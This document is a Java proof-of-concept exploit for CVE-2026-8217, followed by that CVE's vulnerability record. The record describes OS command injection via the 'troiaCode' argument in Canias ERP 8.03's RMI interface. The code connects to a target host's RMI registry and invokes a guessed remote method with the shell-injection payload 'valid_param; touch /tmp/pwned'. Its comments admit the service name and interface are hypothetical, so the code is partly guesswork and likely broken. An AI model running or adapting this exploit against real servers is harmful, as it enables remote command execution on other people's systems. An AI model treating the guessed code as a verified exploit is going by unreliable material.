CVE-2026-8217

import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry; public class CVE_2026_8217_Exploit { public static void main(String[] args) { try { // Target configuration String host = args[0]; int port = Integer.parseInt(args[1]); // Connect to the RMI Registry Registry registry = LocateRegistry.getRegistry(host, port); // Lookup the vulnerable remote object (Name is hypothetical based on description) // Assuming 'VulnerableService' is exposed Remote vulnerableObj = (Remote) registry.lookup("VulnerableService"); // Construct malicious payload for OS Command Injection // Example: Attempting to execute 'touch /tmp/pwned' on Linux or 'calc.exe' on Windows String payload = "valid_param; touch /tmp/pwned"; // Prepare method invocation (Reflection used as interface is unknown) // This simulates sending the malicious 'troiaCode' argument java.lang.reflect.Method method = vulnerableObj.getClass().getMethod("execute", String.class, String.class); method.invoke(vulnerableObj, "troiaCode", payload); System.out.println("[+] Payload sent successfully to " + host); } catch (Exception e) { e.printStackTrace(); } } }

{"cve": {"id": "CVE-2026-8217", "sourceIdentifier": "[email protected]", "published": "2026-05-10T02:16:08.833", "lastModified": "2026-05-11T16:17:40.917", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Industrial Application Software IAS Canias ERP 8.03. Impacted is the function Runtime.getRuntime.exec of the component RMI Interface. Performing a manipulation of the argument troiaCode results in os command injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}, {"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://gist.github.com/0xb1lal/6ccc2356e7e0a26f7b8a6bd6f0d84bbb", "source": "[email protected]"}, {"url": "https://hawktrace.com/blog/caniaserp", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/808262", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362434", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362434/cti", "source": "[email protected]"}, {"url": "https://hawktrace.com/blog/caniaserp/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}